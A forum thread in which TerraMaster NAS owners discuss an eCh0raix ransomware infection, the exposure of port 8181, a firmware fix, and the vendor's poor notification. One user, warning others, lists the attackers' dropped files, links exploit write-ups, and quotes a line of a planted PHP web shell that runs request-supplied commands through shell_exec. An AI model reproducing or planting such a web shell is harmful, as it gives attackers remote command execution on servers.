My TerraMaster F2-210 has been infected by Ransomware eCh0raix / QNAPCrypt

[sianderson]

i completely agree the only reason why I am running 4.2.07 is because I am a member of the forum and saw the manual update, the average joe that didn't do the manual update would still be vulnerable?

however, is this only happening to people who have port forwarded 8181 to the internet? otherwise, how would an attacker be able to get through to the admin page unless another system is compromised?

[Spaniard]

{L_BUTTON_AT}CarlosMtnez

and Jamgot

Please, can you confirm you are NOT running 4.2.07 but an earlier version?

[joeh]

{L_BUTTON_AT}StanHK

It sucks to lose data like that. Keep in mind that although a NAS can be used for backup purposes you should always have a backup located offsite (physical or cloud) or elsewhere that doesn't have the risk of getting infected. I've had the F2-422 for a bit and when I set it up it installed 4.1.30. I went through the settings and disabled things I didn't want on. I found out about the forum when I was searching for an issue I experienced. In the forum I found out about firmware 4.2.07 and when I checked for updates on the NAS it didn't find anything. I read through the messages and that's how I found out about the manual update, which is how I have that version installed. Not sure why the NAS doesn't find the update that was released towards the beginning of the month.

[ermurenz]

Hi guys,
First of all, sorry for my english.
After this, same here.
24 december i've been infected by this ransomware (eCh0raix).
All my docs files and images (not video) results in *.encrypt format.
1TB of data.
After some research i've found that's this is the vulnberability involved:

https://www.exploit-db.com/exploits/49330
http://www.pentest.com.tr/exploits/Terr ... ution.html
https://www.ihteam.net/advisory/terrama ... abilities/

I've tested this with metasploit and some scripts.
It's easy to access to Nas with a simple script using 8181 port.
Seems more difficult using SSL port 5443.
With this, without any username and password, you can upload file, obtain shell on /usr/www/ and launch "your" binary from there.Scary.
On that folder 'i've found some php file and other stuff:
-crp_linux_arm
-sd_arm
-debug34345.php
-ssl3.php
-ssl.php
and some other php files with inside shit like:
if(md5($_REQUEST['p'])=='9d761a9690662f2432d1fbbe7197d448'){echo shell_exec($_REQUEST['c'])
etc etc

crp_linux_arm , in my esperience, was the scarier binary.
I've tested it on a virtual machine and if you launch it, all filesystem has been scanned and encrypted.
I am writing these things so this doesn't happen to others.
You are advised to never publish port 8181.
If you really need to publish, do it with SSL (but don't use 5443 by default).
If you publish 8181/http on the internet, there are no antivirus or firewall that can prevent you from being attacked imho.

Anyway, from what I have read this variant cannot be solved with the decryption tool.
I've tried wthout success.
The only way is to back up the encrypted files and wait for new software to be developed.
I had the latest version of the stable firmware but I'm noting that there are beta versions (4.2.07 the more recent one) here.

Do you know if these are still affected by that vulnerability?

PS: the thing that pisses me off is that this vulnerability has been known for months, but there are no stable updates that fix it.

[TMroy]

{L_BUTTON_AT}ermurenz

All the mentioned vulnerabilities have been fixed! Please read this article and the timeline on the bottom of the article. https://www.ihteam.net/advisory/terrama ... abilities/

[joeh]

{L_BUTTON_AT}TMroy

So the IHTeam timeline shows they found out about it Nov 2nd and made TM aware and TM confirmed on Nov 17. The firmware update released early December resolved the exploits and IHTeam made it public on December 12. How comes registered users weren't pushed a notification to their NAS or email making them aware that exploits were found and the update should be applied ASAP manually since automatically doesn't work? I wasn't affected by this, but if it has happened now, maybe in the past, it can definitely happen in the future.

[ermurenz]

{L_BUTTON_AT}joeh

Exactly, that was my point. I use to update my nas and other stuff as soon as they become available on any panel update. Our case is on "update & recovery" section" of nas. Moreover, i use to update to stable relase, not beta release, of course. and stable relase for my F4-210 is 4.1.32-2008031214. Right now that's the release installed on my nas. If i try "update online", no other release are available. Right now on my nas's dashboard, there' isn't any advise about new release. I'm glad that we have a "manual" update to do but how could I know? it seems absurd to me that I have to connect to the forum, however official, to find out that there are updates for my nas. That's it.

[sianderson]

Looking at the place where 4.2.07 is available, it seems it is a beta version, and there are many many complaints about the stability. Since when is a beta version a fix for a vulnerability?? Even if I want to use it, the download is stupidly slow. Stop lying and fix your software pls.

viewtopic.php?f=28&t=1136

early versions of 4.2.x was a beta while they were still releasing newer versions of 4.1.x however 4.2.06 was meant to be the version that brought both development streams together to go forward with a single version, in my eyes 4.2.07 is meant as a mainstream update rather than a beta version but I cant deny their actions of not putting it as an automatic update on the devices does suggest there is more to it than what I understood

I don't think there will be a 4.1.33 version released

[TMroy]

{L_BUTTON_AT}StanHK

Please check if the package was crashed during your downloading, you can check the MD5 value after download. So now, please try to download it again.

[sianderson]

Not sure it is going to be stable.

as far as stability is concerned mines now solid under 4.2.07 where as it was flaky under previous versions, so at least they now have one happy customer here, but I did jump on 4.2.07 when it was released, my nas drive has been running for 25 days continuously, I realise this is not a lot in the eyes of most nas drives as we are approaching 260 days for my work nas (none TM), but given TM's history I am impressed lol